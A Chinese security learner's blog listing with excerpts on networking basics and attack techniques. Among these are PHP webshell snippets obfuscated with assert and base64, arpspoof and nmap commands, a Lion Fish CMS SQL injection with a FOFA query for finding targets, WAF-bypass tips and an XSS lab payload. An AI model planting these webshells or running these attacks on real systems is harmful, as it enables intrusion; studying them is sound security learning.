- 博客(11)
- 收藏
- 关注
RSS订阅转载 hh.exe
hh.exe是微软windows系统程序,.chm扩展名的帮助文件默认是用hh.exe打开。中文名hh.exe类型windows系统程序隶属微软扩展名.chm目录1 简述 2 作用 3 影响 4 修复方法 简述编辑 语音hh.exe是微软windows系统程序,.chm扩展名的帮助文件默认是用hh.exe打开。如果用户此时并没有查看chm格式的电子书文件或帮助文件,hh.exe又在进程中反复出现,则可能中了hh.exe病毒。在...
2021-11-01 16:41:13
700
转载 IPv4与IPv6区别
1,协议地址的区别1)地址长度IPv4协议具有32位(4字节)的地址长度;IPv4协议具有128位(16字节)地址长度2)地址的表达方式IPv4是以小数点表示的二进制数。IPv6地址是以十六进制表示的二进制数。3)地址配置IPv4协议的地址可以通过手动或DHCP配置的。IPv4协议需要使用Internet控制消息协议版本6(ICMPv6)或DHCPv6的无状态协议地址自动配置(SLAAC)。2.数据包的区别1)包的大小IPv4协议的包头长度需要576个字节,碎片.
2021-11-01 12:52:37
8214
1
转载 狮子鱼cms-SQL注入
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞FOFA语法: “/seller.php?s=/Public/login”后台登录界面漏洞点:ApiController.class.phppublic function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
2021-10-20 19:40:22
2107
4
原创 木马思路笔记
1.调用<?php$a = "assert";$fun = "a";$$fun($_POST['a']);?>2.编码解码+replace()<?php$a="YXNk";$b="c2VydA==";$c= urlencode ( $a );$d= urlencode ( $b );$e=base64_decode(urldecode($c));$f=base64_decode((urldecode($d)));$s=substr_replace("$e","$
2021-10-20 19:39:12
117
原创 ARP欺骗
kali linux 进行ARP欺骗arpspoof -i eth0 -t ip地址受害ip:192.168.1.105攻击ip:192.168.1.103命令 arpspoof -t 192.168.1.105 192.168.1.1 -i eth0kali nmapnmap -sP 10.0.105.1/24 :探测10.0.105网段中的全部主机。nmap -O IP :探测指定IP的相关数据。nmap -p 端口号1,端口号2 IP -sV:探测指定IP、指定端口是那个版本的软件打
2021-10-20 19:35:56
72
原创 IPS/IDS WAF
二者区别主要有以下几点:一、概念不同1、IDS是英文“Intrusion Detection Systems”的缩写,中文意思是“入侵检测系统”。专业上讲就是依照一定的安全策略,通过软、硬件,对网络、系统的运行状况进行监视,尽可能发现各种攻击企图、攻击行为或者攻击结果,以保证网络系统资源的机密性、完整性和可用性。2、入侵防御系统(Intrusion-prevention system)是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够即时的中断、调整或隔离一些不正常或是..
2021-10-16 15:45:58
945
原创 网络七层模型
物理层:网卡,网线,集线器,中继器,调制解调器数据链路层:网桥,交换机网络层:路由器交换机与路由器区别交换机:1,数据链路层2,根据mac地址转发数据帧3,组建局域网4,分割冲突域,但不分割广播域路由器:1,网络层2,根据IP地址来转发ip数据包/分组3,连接外网4,分隔冲突域,广播域数据包封装FCS (帧校验序列(帧尾))FCS:Frame Check Sequence(帧校验序列),俗称帧尾,即计算机网络数据链路层的协议数据单元(帧..
2021-10-15 12:50:53
81
原创 sql注入waf绕过
1.WAF过滤机制:1.异常检测协议–拒绝不符合HTTP标准的请求;2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证;3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题;4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活;5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄露保护等。基础绕过思路1.大小写绕过2.编码绕过char编码,hex,url编码3.替换关键.
2021-09-30 15:42:06
933
原创 xss-labs笔记更新中
levle1修改url栏的name值页面发生变化,发现可以传参http://127.0.0.1/xss/level1.php?name=best在url中构造这段js代码<script>alert(1)</script>levle2观察html页面代码,输出做了转义,但是输入没有做转义,利用input的结束符>闭合input,同时注意闭合",此时闭合后,事件无法运行,此处只能写入标签<script>,构建payload"><scr
2021-08-12 15:13:04
229
转载 缓冲区溢出攻击原理、方法及防范(一)
由于C/C++语言本身没有数组越界检查机制,当向缓冲区里写入的数据超过了为其分配的大小时,就会发生缓冲区溢出。攻击者可以利用缓冲区溢出来窜改进程运行时栈,从而改变程序的正常流向。在分析缓冲区溢出攻击的原理之前,我们先来复习一下进程在内存中的结构。进程在内存中的组织形式Text段主要包含程序代码(一系列可执行的指令),另外还有一些只读的数据。通常操作系统标记该段为只读段,如果有进程试图修改该段,会引发段错误。Data段包括已初始化和未初始化的全局变量,静态变量也放于...
2021-07-15 19:59:09
5274
转载 路由器的原理及其配置(一)
一,路由器的基础知识 (1)路由器概述 作为网络层的网络互连设备路由器在网络互连中起到了不可或缺的作用。与物理层或数据链路层的网络互连设备相比,其具有一些物理层或数据链路层的网络互连设备所没有的重要功能。它能实现异构网络的互连,在物理上拓展了网络的规模;实现网络的逻辑划分;实现VLAN之间的通信;同时,还可以实现其他一些重要的网络功能,如提供访问控制功能、优先级服务和负载平衡等 路由器是工作在网络层的设备。路由器负责将数据分组从源端...
2021-07-10 10:43:57
761
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人